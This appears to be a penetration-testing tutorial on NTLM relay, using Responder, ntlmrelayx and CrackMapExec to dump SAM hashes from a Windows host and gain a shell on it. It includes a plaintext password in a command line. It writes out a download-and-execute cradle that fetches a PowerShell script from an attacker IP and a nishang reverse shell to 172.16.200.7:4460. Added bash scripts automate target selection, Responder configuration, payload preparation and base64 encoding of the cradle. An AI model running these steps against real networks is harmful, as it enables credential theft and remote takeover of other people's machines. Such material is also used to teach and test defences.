NTLM Relay


Last updated 5 months ago

Imagine a user who is a local Administrator on another computer. If we can capture an NTLM authentication from that user and relay it to that computer, we inherit their privileges there: we can extract the SAM hashes or even execute remote commands.

For example, Sara Ardila is a local Administrator on Carlos Villamizar's computer (PC-CARLOS). CrackMapExec confirms it: hosts where the supplied user is a local administrator are marked with (Pwn3d!):

crackmapexec smb 10.10.10.0/24 -u 'sara.ardila' -p 'Sar@91082'

Extract SAM hashes

We need to create a file of targets, targets.txt, with one IP or hostname per line (in this case only PC-CARLOS). Only hosts that do not require SMB signing are valid relay targets: a relayed session to a host that enforces signing is rejected.

Then edit Responder.conf and set SMB = Off and HTTP = Off. Responder must only poison the name resolution, not answer the SMB/HTTP connection itself; otherwise it captures the hash instead of letting ntlmrelayx relay it. Start Responder:

sudo python3 Responder/Responder.py -I eth0

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support

So, knowing that Sara is an administrator on PC-CARLOS, we wait for Sara's machine to try to reach a service or task by a name that does not resolve. Responder answers that LLMNR/NBT-NS lookup with our IP, so Sara's machine authenticates to us with NTLM. ntlmrelayx forwards that authentication to PC-CARLOS, where Sara is an administrator, and runs the attack with her privileges. The hash is never cracked, only relayed.

Responder shows the poisoned request, and ntlmrelayx shows the authentication succeeding against the target and the SAM hashes being dumped (screenshots in the original).

With those hashes we can do Pass-The-Hash.
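The target-list and Responder.conf steps above, scripted as an added example (not from the original page or from the Responder or impacket projects). It assumes CrackMapExec output saved to a file in its usual one-line-per-host format and the stock Responder.conf layout; the hosts, IPs and scan lines are constructed. Hosts marked (signing:True) are dropped because a relayed SMB session to a host that requires signing is rejected; CrackMapExec's --gen-relay-list option produces the same list directly.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): prepare the NTLM relay setup.
# Hostnames, IPs and the sample scan lines below are constructed.
set -euo pipefail

# Build targets.txt from saved CrackMapExec output, keeping only hosts whose
# SMB signing is not required. Prints the number of targets written.
# Usage: build_relay_targets <cme_output_file> <targets_file>
build_relay_targets() {
    local scan="$1" out="$2"
    # cme prints "(signing:False)" for hosts that do not enforce signing.
    grep -E '^SMB[[:space:]]' "$scan" \
        | grep -F '(signing:False)' \
        | awk '{print $2}' | sort -u > "$out"
    wc -l < "$out" | tr -d ' '
}

# Turn off Responder's own SMB and HTTP servers in Responder.conf so the
# poisoned victim connects to ntlmrelayx instead of being answered by Responder.
# Prints how many of the two lines now read "= Off".
# Usage: responder_disable_servers <Responder.conf>
responder_disable_servers() {
    local conf="$1"
    sed -i -E 's/^(SMB|HTTP)[[:space:]]*=[[:space:]]*On/\1 = Off/' "$conf"
    grep -E '^(SMB|HTTP) = Off' "$conf" | wc -l | tr -d ' '
}

# Constructed demo data: a cme scan and a trimmed Responder.conf.
WORK=$(mktemp -d)
cat > "$WORK/cme.txt" <<'EOF'
SMB         10.10.10.5      445    PC-CARLOS        [*] Windows 10.0 Build 19041 x64 (name:PC-CARLOS) (domain:CORP) (signing:False) (SMBv1:False)
SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:CORP) (signing:True) (SMBv1:False)
SMB         10.10.10.7      445    PC-LUIS          [*] Windows 10.0 Build 19041 x64 (name:PC-LUIS) (domain:CORP) (signing:False) (SMBv1:False)
EOF
cat > "$WORK/Responder.conf" <<'EOF'
[Responder Core]
; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
EOF

build_relay_targets "$WORK/cme.txt" "$WORK/targets.txt"   # prints 2 (DC01 dropped)
responder_disable_servers "$WORK/Responder.conf"         # prints 2

# The commands to run next (printed, not executed here): poisoner, then relay.
echo "sudo python3 Responder/Responder.py -I eth0"
echo "python3 ntlmrelayx.py -tf $WORK/targets.txt -smb2support"
```

Run the relay before Responder starts poisoning, so the first victim connection already has something listening on 445.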

Execute remote commands

cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 ipst.ps1

Take line 20:

19 │ .EXAMPLE
20 │ PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Copy that call to the bottom of the file, outside the comment block, and change the values to our attacker IP (172.16.200.7) and port 4460, so the reverse shell is launched as soon as the script is loaded:

Now serve that file over HTTP and start a listener on port 4460 to receive the PowerShell reverse shell:

➧ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
➧ nc -lvp 4460
listening on [any] 4460 ...

Now, execute ntlmrelayx:

python3 ntlmrelayx.py -tf targets.txt -smb2support -c "powershell IEX(New-Object Net.WebClient).downloadString('http://172.16.200.7:8000/ipst.ps1')"

With this, the relayed session makes PC-CARLOS download the script from our server and load it with IEX. Because the call we appended at the bottom is outside the comment block, it runs right after the function is defined and connects back to our listener.

Now start Responder (remember, with SMB and HTTP set to Off in Responder.conf):

sudo python3 Responder/Responder.py -I eth0

Wait for Sara's machine to try to reach a nonexistent or down service, task or folder, so the name lookup fails and Responder can poison it (screenshot in the original).

In our listener we get the shell:

We are inside PC-CARLOS, using Sara's privileges on PC-CARLOS :O
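The payload preparation above, scripted as an added example (not from the original page or from nishang). It assumes the page's attacker IP 172.16.200.7, HTTP port 8000 and listener port 4460; the nishang script is replaced by a constructed stand-in that keeps the same .EXAMPLE line. It also goes beyond the page by producing the base64 (UTF-16LE) form for powershell -enc, which sidesteps the quoting problems of passing a download cradle through ntlmrelayx -c.

```shell
#!/usr/bin/env bash
# Added example (not from the original page or nishang): build the pieces of
# the "execute remote commands" step. 172.16.200.7, 8000 and 4460 are the
# page's values; file paths are assumptions.
set -euo pipefail

# Copy Invoke-PowerShellTcp.ps1 and append the call from its .EXAMPLE block
# with our own IP/port, so the reverse shell fires as soon as the script is
# loaded with IEX. Prints the appended line.
# Usage: prepare_nishang <src.ps1> <dst.ps1> <attacker_ip> <port>
prepare_nishang() {
    local src="$1" dst="$2" ip="$3" port="$4"
    cp "$src" "$dst"
    printf '\nInvoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\n' "$ip" "$port" >> "$dst"
    tail -n 1 "$dst"
}

# Download cradle that ntlmrelayx will run on the target.
# Usage: make_cradle <attacker_ip> <http_port> <script_name>
make_cradle() {
    printf "IEX(New-Object Net.WebClient).downloadString('http://%s:%s/%s')" "$1" "$2" "$3"
}

# Base64 of the UTF-16LE command, the format "powershell -enc" expects.
# Usage: encode_ps <powershell_command>
encode_ps() {
    printf '%s' "$1" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n'
}

# Full ntlmrelayx command line for the relay-and-execute step, either with
# the cradle inline (as on the page) or base64-encoded.
# Usage: relay_cmd <targets_file> <cradle> [enc]
relay_cmd() {
    local targets="$1" cradle="$2" mode="${3:-plain}"
    if [ "$mode" = "enc" ]; then
        printf 'python3 ntlmrelayx.py -tf %s -smb2support -c "powershell -enc %s"\n' \
            "$targets" "$(encode_ps "$cradle")"
    else
        printf 'python3 ntlmrelayx.py -tf %s -smb2support -c "powershell %s"\n' \
            "$targets" "$cradle"
    fi
}

# Demo on a constructed stand-in for the nishang script
# (the real one lives in /opt/nishang/Shells/ on the page's box).
WORK=$(mktemp -d)
cat > "$WORK/Invoke-PowerShellTcp.ps1" <<'EOF'
function Invoke-PowerShellTcp
{
<#
.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444
#>
    param($IPAddress, $Port, [switch]$Reverse)
}
EOF
prepare_nishang "$WORK/Invoke-PowerShellTcp.ps1" "$WORK/ipst.ps1" 172.16.200.7 4460
CRADLE=$(make_cradle 172.16.200.7 8000 ipst.ps1)
relay_cmd targets.txt "$CRADLE"
relay_cmd targets.txt "$CRADLE" enc
```

Serve ipst.ps1 from the directory the HTTP server is started in, and keep the listener on 4460 up before the relay fires; the encoded form is the one to use when the cradle has to pass through extra layers of shell quoting.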

References:

https://github.com/lgandx/Responder
https://github.com/samratashok/nishang